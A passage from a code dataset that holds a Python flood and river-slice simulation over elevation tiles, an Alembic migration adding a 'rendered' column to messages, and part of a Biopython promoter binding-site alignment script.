1/self.dem.shape[0]\n x_coordinate = int(round(lng/x_path, 0))\n y_coordinate = int(round(lat/y_path, 0))\n\n # Check that coordinate contains right cell\n # There can be error with rounding\n if self.accumulation_for_point((y_coordinate, x_coordinate)) < 1000:\n acc_near = self.acc[\n y_coordinate-4 : y_coordinate+5,\n x_coordinate-4 : x_coordinate+5\n ]\n max_index = unravel_index(acc_near.argmax(), acc_near.shape)\n y_coordinate = y_coordinate + max_index[0]-4\n x_coordinate = x_coordinate + max_index[1]-4\n return (y_coordinate, x_coordinate)\n else:\n return (y_coordinate, x_coordinate)\n\n\n def create_acc_graph(self, acc_slice, dir_slice, min_acc):\n acc_slice[acc_slice < min_acc] = 0\n self.acc_slice = acc_slice # For future nodes matching\n self.acc_Graph = nx.DiGraph()\n for i in range(1, acc_slice.shape[0]-1):\n for j in range(1, acc_slice.shape[1]-1):\n if acc_slice[i, j] != 0:\n dir = dir_slice[i, j]\n dir = dir if dir >= 1 else 1\n start = (i, j)\n target = self.fdir_coordinate(start, dir)\n #print(start, target)\n self.acc_Graph.add_edge(start, target)\n\n\n def fdir_coordinate(self, point, dir):\n (row, column) = point\n if dir == 64: #Up\n return (row - 1, column)\n elif dir == 128: #Up-Right\n return (row - 1, column + 1)\n elif dir == 1: #Right\n return (row, column + 1)\n elif dir == 2: #Down-Right\n return (row + 1, column + 1)\n elif dir == 4: #Down\n return (row + 1, column)\n elif dir == 8: #Down-Left\n return (row + 1, column - 1)\n elif dir == 16: #Left\n return (row, column - 1)\n else: #Up-Left\n return (row - 1, column - 1)\n\n \n def out_node(self, node):\n return [node for node in self.acc_Graph.edges(node)][0][1]\n\n def out_node_G(self, node):\n return [node for node in self.G.edges(node)][0][1]\n\n def in_node(self, node):\n in_nodes = [edge[0] for edge in self.acc_Graph.in_edges(node)]\n nodes_accumulation = [self.acc_slice[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n \n def in_nodes(self, node):\n return [node[0] for node in self.G.in_edges(node)]\n\n\n def accumulation_for_point(self, point):\n return self.acc[point[0], point[1]]\n\n\n\n \n # Flood Part\n\n def compute_flood(self, coordinate, top_left, bottom_right, lenth, target_h, uniform_flooding=False):\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n y, x = point[0], point[1]\n lenth_with_offset = int(lenth/(self.point_size_meteres * self.compression) + 40) # For offset\n flood_area_fdir = self.fdir[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_dem = self.dem[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_acc = self.acc.copy()\n flood_area_acc = flood_area_acc[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n new_x, new_y = lenth_with_offset, lenth_with_offset\n new_point = (new_y, new_x)\n\n # Create temporary acc graph\n self.create_acc_graph(flood_area_acc, flood_area_fdir, 200)\n\n # Get river pathes\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, _, success = self.compute_river_path(new_point, lenth)\n\n # Graph for specified area\n self.G = nx.DiGraph()\n shape = flood_area_fdir.shape\n\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = flood_area_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n self.G.add_edge(start, target)\n\n # Make flood\n if uniform_flooding == False:\n self.h = flood_area_dem[new_y, new_x] + target_h\n\n flooded_nodes_down = []\n all_out_nodes = [] # For both up and down\n for i, node in enumerate(river_pathes_nodes_DOWN[::-1]): # Начинаем с последней затопленной клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_DOWN[0]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n #print(node, in_nodes)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_DOWN).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n\n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_down += all_nodes\n all_out_nodes += out_nodes_log\n\n flooded_nodes_up = []\n for i, node in enumerate(river_pathes_nodes_UP): # Начинаем с первой клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_UP[-1]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_UP).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_up += all_nodes\n all_out_nodes += out_nodes_log\n\n self.h = flood_area_dem[new_y, new_x] + target_h\n return flood_area_acc.shape, flooded_nodes_down, flooded_nodes_up, all_out_nodes, flood_area_dem, self.h, point, lenth_with_offset\n\n \n def get_step(self, y_delta, x_delta):\n \"\"\"\n Calculate step for future river slice\n \"\"\"\n if ((y_delta > 3) and (x_delta > 3)) \\\n or ((y_delta < -3) and (x_delta < -3)):\n return (1, 1)\n elif ((y_delta > 3) and (x_delta < -3)) \\\n or ((y_delta < -3) and (x_delta >3)):\n return (1, -1)\n elif x_delta <= 3:\n return (0, 1)\n else:\n return (1, 0)\n\n \n def get_river_slice(self, file_path, DEMs_path, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n # Creat new df to save successes of river slices\n self.df_new = pd.DataFrame(columns=['hstation_id', 'success'])\n \n # For future save\n self.dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n \n x_lon_past, y_lat_past = None, None\n \n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n max_height = int(row[3])\n coordinate = (x_lon, y_lat)\n \n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=1)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n \n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n \n # Coordinates for defining river path\n new_top_left, new_bottom_right = (point[0]-20, point[1]-20), (point[0]+20, point[1]+20)\n cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n # Graph for specified area\n G = nx.DiGraph()\n shape = cut_fdir.shape\n\n try:\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = cut_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n G.add_edge(start, target)\n except:\n dct = {\n 'hstation_id': hstation_id, \n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/river_slice_success_table.csv', sep=';', decimal=',', index=False)\n continue\n\n real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n \n def out_node_G(node):\n return [node for node in G.edges(node)][0][1]\n \n def in_node_G(node):\n in_nodes = [edge[0] for edge in G.in_edges(node)]\n nodes_accumulation = [cut_acc[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n\n outs = [real_coord]\n while len(outs) < 5:\n out = out_node_G(outs[-1])\n outs.append(out)\n\n ins = [real_coord]\n while len(ins) < 5:\n in_ = in_node_G(ins[-1])\n ins.append(in_)\n \n # Clearing instances\n del G, new_top_left, new_bottom_right, cut_fdir, cut_acc, cut_dem\n \n \n # Coordinates for river shape\n# new_top_left, new_bottom_right = (point[0]-550, point[1]-550), (point[0]+550, point[1]+550)\n# cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n start, end = ins[-1], outs[-1]\n y_delta, x_delta = end[0] - start[0], end[1] - start[1]\n\n step = self.get_step(y_delta, x_delta)\n# real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n# target_height = cut_dem[real_coord] + 15\n target_height = self.dem[point] + max_height\n# start = real_coord\n start = point\n\n# right_heights = [self.dem[real_coord]]\n# right_coords = [real_coord]\n right_heights = [self.dem[point]]\n right_coords = [point]\n while (max(right_heights) < target_height) and (len(right_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n right_heights.append(height)\n right_coords.append(start)\n\n# start = real_coord\n start = point\n step = [-i for i in step]\n# left_heights = [cut_dem[real_coord]]\n# left_coords = [real_coord]\n left_heights = [self.dem[point]]\n left_coords = [point]\n while (max(left_heights) < target_height) and (len(left_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n left_heights.append(height)\n left_coords.append(start)\n\n river_slice = left_heights[::-1] + right_heights[1:]\n coords_slice = left_coords[::-1] + right_coords[1:]\n coords_bin_slice = [0 if type(coord) != tuple else 1 for coord in coords_slice]\n\n if os.path.exists(f'{save_path}/{hstation_id}') == False:\n os.makedirs(f'{save_path}/{hstation_id}')\n\n path_to_csv = f'{save_path}/{hstation_id}/{hstation_id}_river_slice.csv'\n final_df = pd.DataFrame({'HEIGHTS': river_slice, 'WaterpostFlag': coords_bin_slice})\n final_df['meteres_path'] = 30 if lat_num+1 <= 60 else 60\n final_df.to_csv(path_to_csv, index=False, sep=';')\n \n dct = {\n 'hstation_id': hstation_id, \n 'max_height': max_height,\n 'success': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n \n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id,\n 'max_height': max_height,\n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n", "repo_name": "nikitaoltyan/MCHS_WaterSheds", "sub_path": "Graph.py", "file_name": "Graph.py", "file_ext": "py", "file_size_in_byte": 27639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "name"}, {"api_name": "WaterShed.WaterSheds", "line_number": 124, "usage_type": "call"}, {"api_name": "WaterShed.WaterSheds", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 166, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 214, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 225, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 298, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 427, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 435, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 438, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 438, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 467, "usage_type": "call"}, {"api_name": "os.path", "line_number": 467, "usage_type": "name"}, {"api_name": "networkx.DiGraph", "line_number": 498, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 586, "usage_type": "call"}, {"api_name": "os.path", "line_number": 586, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 587, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 590, "usage_type": "call"}]} +{"seq_id": "19628616589", "text": "\"\"\"add rendered to messages\n\nRevision ID: 7563cb70be2d\nRevises: f33cced0cb75\nCreate Date: 2022-05-14 10:06:18.749900+00:00\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlmodel\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"7563cb70be2d\"\ndown_revision = \"f33cced0cb75\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\n \"messages\",\n sa.Column(\n \"rendered\",\n sqlmodel.sql.sqltypes.AutoString(),\n ),\n )\n # ### end Alembic commands ###\n\n # Set the rendered value to the current content and then make it non-null\n op.execute(\"UPDATE messages SET rendered = content\")\n op.alter_column(\"messages\", \"rendered\", nullable=False)\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"messages\", \"rendered\")\n # ### end Alembic commands ###\n", "repo_name": "WaffleHacks/application-portal", "sub_path": "common/database/migrations/versions/7563cb70be2d_add_rendered_to_messages.py", "file_name": "7563cb70be2d_add_rendered_to_messages.py", "file_ext": "py", "file_size_in_byte": 953, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlmodel.sql.sqltypes.AutoString", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlmodel.sql", "line_number": 25, "usage_type": "attribute"}, {"api_name": "alembic.op.execute", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "32899997897", "text": "import Bio.pairwise2 as pairwise2\nfrom Bio.pairwise2 import format_alignment\nimport Bio.motifs as motifs\nimport csv\nimport time\nimport re\n\nclass SubUnit_Object(object): \n def __init__(self, Cell_ID, Pathway, Reaction, Enzyme, SubUnit, Promoter_Sequence, Hash):\n self.Cell_Line = Cell_ID #The cell line this enzyme is found at. \n self.Pathway_ID = Pathway #Identity of the pathway this subunit serves.\n self.Reaction_ID = Reaction #Identity of the reaction this subunit serves.\n self.Enzyme_ID = Enzyme #Identity of the enzyme that contains this subunit. \n self.SubUnit_ID = SubUnit #ID of this subunit.\n self.Sequence = Promoter_Sequence #Promoter sequence of this subunit.\n self.Putative_Site = [] #Putative sites that has an impact on this subunit. In form of a list of dictionaries.\n self.Hash = Hash\n\n def read_site(self, Site_ID, Site_Location, Site_Sequence, Site_RC):\n #Takes input from file to create a list of dictionaries. \n self.Putative_Site.append({\"Site_ID\": Site_ID, \"Start_Location\": int(Site_Location),\n \"End_Location\": int(Site_Location) + len(Site_Sequence),\n \"Site_Sequence\": Site_Sequence, \"Reverse_Complement\": Site_RC})\n \n def align(self, Compared_Object, start=0, end=0, OpG_Penalty=-10, ExG_Penalty=-1, EndG_Penalty = False): \n #Align a given subunit or putative site to a part of this object. \n end = len(self.Sequence) if end == 0 else end\n Interest_Sq = self.Sequence[start:end].upper() #Sequence that we are interested to check. Is equal to entire sequence if no start and end location is given.\n Compared_Sq = Compared_Object if type(Compared_Object) == str else Compared_Object.Sequence.upper() #Sequence that we comparing.\n if Interest_Sq == \"\":\n return[[\"-\",\"-\",0]]\n Needleman = pairwise2.align.globalms(Interest_Sq, Compared_Sq, 5, -4, OpG_Penalty, ExG_Penalty, penalize_end_gaps = EndG_Penalty)\n return Needleman\n\n def find_site(self, Reference_Sq, Known_Coordinates, Index=0, Slash_Count=0, Is_End=0, Aligned=0): \n Updated_Start = 0\n Updated_End = 0\n \n if Aligned == 0:\n #Count number of slashes before the putative site. Do not count slashes as characters so that the final value of the while loop is \n # equal to initial location of the site.\n Known_Location = Known_Coordinates[1] if Is_End == 1 else Known_Coordinates[0] + 1\n while Index < Known_Location:\n if Reference_Sq[Index + Slash_Count] == \"-\":\n Slash_Count = Slash_Count + 1\n else:\n Index = Index + 1\n Updated_Start = Known_Location + Slash_Count if Is_End == 1 else Known_Location + Slash_Count - 1\n #After finding the initial location, call the function recursively but this time to find the new end location. \n if Is_End == 0:\n Updated_End = self.find_site(Reference_Sq, Known_Coordinates, Index, Slash_Count, Is_End=1)\n if Is_End == 1:\n return Updated_Start \n else:\n #If transferring from aligned to actual, remove slashes from before and within the sequence. \n Slash_Before_Start = Reference_Sq[0:Known_Coordinates[0]+1].count(\"-\")\n Slash_Before_End = Reference_Sq[0:Known_Coordinates[1]].count(\"-\")\n Shift = Slash_Before_End - Slash_Before_Start #If any gaps where removed from within the corresponding region, pull 1 char from both sides to make up for it. \n if Shift == Known_Coordinates[1] - Known_Coordinates[0] - 1: #If there are no matching sites corresponding to the sequence just return an emptry string location.\n return [0, 0]\n Updated_Start = Known_Coordinates[0] - Slash_Before_Start - Shift\n Updated_End = Known_Coordinates[1] - Slash_Before_End + Shift \n return [Updated_Start, Updated_End]\n\n def refine(self, ComparisonList):\n RefinedSites = []\n for Comparison in ComparisonList:\n string = Comparison[1]\n slashes = re.finditer(\"-\", string)\n match_pos = [slash.start() for slash in slashes]\n match_pos.insert(0, -1)\n match_pos.append(len(string)+1)\n\n for ind in range(len(match_pos)):\n if match_pos[ind+1] - match_pos[ind] > 1:\n start_str, end_str = match_pos[ind], match_pos[ind+1]\n break;\n RefinedSites.append(Comparison[0][start_str+1:end_str]) \n return RefinedSites\n\n def compare(self, Compared_Object):\n Alignment = self.align(Compared_Object)\n Alignment = Alignment[0]\n for Item in Compared_Object.Putative_Site:\n Aligned_Site_Locations = self.find_site(Alignment[1] , [Item[\"Start_Location\"], Item[\"End_Location\"]])\n Translated_Site_Locations = self.find_site(Alignment[0], Aligned_Site_Locations, Aligned = 1)\n if Translated_Site_Locations == [0,0]:\n continue;\n Hit_Achieved_Zone = self.Sequence[Translated_Site_Locations[0]:Translated_Site_Locations[1]]\n if len(Hit_Achieved_Zone) == len(Item[\"Site_Sequence\"]):\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100, EndG_Penalty = True)\n else:\n Comparison = self.align(Item[\"Site_Sequence\"], Translated_Site_Locations[0], Translated_Site_Locations[1], OpG_Penalty=-100)\n if Comparison[0][2] >= len(Item[\"Site_Sequence\"])*2 and \"-\" not in Comparison[0][0]:\n if len(Item[\"Site_Sequence\"]) < len(Hit_Achieved_Zone):\n Hit_Achieved_Zone = self.refine(Comparison)\n self.Putative_Site.append({\"Site_ID\": Item[\"Site_ID\"], \"Start_Location\": Translated_Site_Locations[0],\n \"End_Location\": Translated_Site_Locations[1], \"Site_Sequence\": Hit_Achieved_Zone,\n \"Motif\": Item[\"Site_Sequence\"], \"Reverse_Complement\": Item[\"Reverse_Complement\"]}) \n\n def count_site(self, Database_Directory):\n Site_Counts = {}\n with open(Database_Directory) as Database:\n for Motif in motifs.parse(Database, \"jaspar\"):\n Count = 0\n for Sites in self.Putative_Site:\n if Motif.name == Sites[\"Site_ID\"]:\n Count = Count + 1\n if Count == 0:\n continue;\n Site_Counts[Motif.name] = Count\n return Site_Counts\n \n def write(self, Database_Directory):\n Site_Counts = self.count_site(Database_Directory)\n Total_Count = sum(Site_Counts.values())\n Record = {\"Cell ID\": self.Cell_Line, \"Pathway\": self.Pathway_ID, \"Enzyme\": self.Enzyme_ID, \n \"Reaction\": self.Reaction_ID, \"SubUnit\": self.SubUnit_ID, \"Promoter\": self.Sequence, \n \"Sites\": self.Putative_Site, \"Site Counts\": Site_Counts, \"Site Index\": Total_Count/len(self.Sequence), \"Hash\" : self.Hash}\n return Record\n\ndef read_csv(csv_directory, File_Type):\n with open(csv_directory) as csv_file:\n Mode = \"\"\n if File_Type == \"Reference\":\n Reference_Dictionary_List = []\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n Reader = csv.reader(csv_file, delimiter = \";\")\n for Row in Reader:\n #Read the current program and adjust what program is doing with respect to what you read.\n if Row == []:\n continue;\n Mode = (\"Read Sequence\" if Row[0] == \"Cell ID\" else \n (\"Read Factor\" if Row[0] == \"HIT ID\" else Mode))\n if (Row[0] == \"Enzyme ID\") or (Row[0] == \"HIT ID\"):\n continue;\n elif Row[0] == \"NULL\":\n Temporary_Dictionary[\"Sites\"] = Temporary_Site_List\n Reference_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n Temporary_Dictionary = {}\n Temporary_Site_List = []\n continue;\n #If the mode of the program is set, and its not a mode changing location, read the data.\n if Mode == \"Read Sequence\":\n Temporary_Dictionary = {\"Cell ID\": Row[0], \"Pathway\": Row[1], \"Reaction\": Row[2],\n \"Enzyme\": Row[3], \"SubUnit\": Row[4], \"Promoter\": Row[5], \"Hash\": Row[7]}\n elif Mode == \"Read Factor\":\n factorPosition = int(Row[1]) if int(Row[1]) >= 0 else len(Temporary_Dictionary[\"Promoter\"]) + int(Row[1])\n reverseComplement = 1 if int(Row[1]) <= 0 else 0\n Temporary_Site_List.append([Row[0], factorPosition, Row[5], reverseComplement])\n return Reference_Dictionary_List\n elif File_Type == \"Comparison\":\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n Compared_Dictionary_List = []\n Temporary_Dictionary = {\"Cell ID\": \"\"} \n Hash_Tracker = [] \n for Row in Reader:\n if Row[\"Hash\"] in Hash_Tracker:\n continue;\n Hash_Tracker.append(Row[\"Hash\"])\n if Row[\"Compared Gene Name\"] == \"\":\n continue;\n Temporary_Dictionary[\"Cell ID\"] = Row[\"Compared Cell Line\"] if Temporary_Dictionary[\"Cell ID\"] == \"\" else Temporary_Dictionary[\"Cell ID\"] \n Temporary_Dictionary[\"SubUnit\"] = Row[\"Compared Gene Name\"]\n Temporary_Dictionary[\"Promoter\"] = Row[\"Compared Sequence\"]\n Temporary_Dictionary[\"Hash\"] = Row[\"Hash\"]\n if Row[\"Pathway\"] != \"\":\n Temporary_Dictionary[\"Pathway\"] = Row[\"Pathway\"]\n if Row[\"Reaction\"] != \"\":\n Temporary_Dictionary[\"Reaction\"] = Row[\"Reaction\"]\n if Row[\"Compared Enzyme\"] != \"\":\n Temporary_Dictionary[\"Enzyme\"] = Row[\"Compared Enzyme\"]\n \n Compared_Dictionary_List.append({Key : Temporary_Dictionary[Key] for Key in Temporary_Dictionary.keys()})\n return Compared_Dictionary_List \n elif File_Type == \"Pathway\":\n Pathway_Dict = {}\n Reader = csv.DictReader(csv_file, delimiter = \";\")\n for Row in Reader:\n if Row[\"Pathway\"] != \"\":\n Pathway_Dict[Row[\"Pathway\"]] = {}\n else:\n Row[\"Pathway\"] = list(Pathway_Dict.keys())[-1] \n if Row[\"Compared Enzyme\"] != \"\": \n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]] = {}\n else:\n Row[\"Compared Enzyme\"] = list(Pathway_Dict[Row[\"Pathway\"]].keys())[-1]\n Pathway_Dict[Row[\"Pathway\"]][Row[\"Compared Enzyme\"]][Row[\"Compared Gene Name\"]] = {}\n return Pathway_Dict \n\ndef measure_key_frequency(dict_of_dicts):\n frequency = {}\n for d in dict_of_dicts.values():\n for key in d.keys():\n frequency[key] = 1 if key not in frequency else frequency[key] + 1\n return frequency\n\ndef reverseComplement(sequence):\n complement = {\"A\": \"T\", \"T\": \"A\", \"C\": \"G\", \"G\":\"C\"}\n reverseSq = sequence[::-1]\n reverseComplementSq = \"\"\n for char in reverseSq:\n char = char.upper()\n reverseComplementSq += complement[char]\n return reverseComplementSq\n\nif __name__ == \"__main__\": \n Comparison_Directory = input(\"Please enter Comparison List directory\")\n Reference_Directory = input(\"Please enter Scanner Results' directory\")\n Database_Directory = input(\"Please enter Putative Site database directory\")\n start = time.time()\n\n Reference_Sequence_Dictionary = read_csv(Reference_Directory, \"Reference\")\n Compared_Sequence_Dictionary = read_csv(Comparison_Directory, \"Comparison\")\n Pathway_Dictionary = read_csv(Comparison_Directory, \"Pathway\")\n \n Result_Dictionary = {}\n SubResults = open(\"SubunitWideAnalysis.csv\", \"w\")\n SubResult_Writer = csv.writer(SubResults, delimiter = \";\")\n Enzyme_Results = open(\"EnzymeWideAnalysis.csv\", \"w\")\n EnzymeResult_Writer = csv.writer(Enzyme_Results, delimiter = \";\")\n Pathway_Results = open(\"PathwayWideAnalysis.csv\", \"w\")\n PathwayResult_Writer = csv.writer(Pathway_Results, delimiter = \";\")\n \n for SUBUNIT in Compared_Sequence_Dictionary:\n Compared_Sequence = SubUnit_Object(SUBUNIT[\"Cell ID\"], SUBUNIT[\"Pathway\"], SUBUNIT[\"Reaction\"],\n SUBUNIT[\"Enzyme\"], SUBUNIT[\"SubUnit\"], SUBUNIT[\"Promoter\"], SUBUNIT[\"Hash\"])\n for REFERENCE in Reference_Sequence_Dictionary:\n if SUBUNIT[\"Hash\"] == REFERENCE[\"Hash\"]:\n Reference_Sequence = SubUnit_Object(REFERENCE[\"Cell ID\"], REFERENCE[\"Pathway\"], REFERENCE[\"Reaction\"],\n REFERENCE[\"Enzyme\"], REFERENCE[\"SubUnit\"], REFERENCE[\"Promoter\"], REFERENCE[\"Hash\"])\n for Site in REFERENCE[\"Sites\"]: \n Reference_Sequence.read_site(Site[0],Site[1],Site[2], Site[3])\n Compared_Sequence.compare(Reference_Sequence)\n Resulting_Object = Compared_Sequence.write(Database_Directory)\n if SUBUNIT[\"SubUnit\"] in Result_Dictionary.keys():\n if type(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"]) != list:\n print(\"{}:\\t{}\".format(Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Hash\"], Result_Dictionary[SUBUNIT[\"SubUnit\"]][\"Site Counts\"]))\n 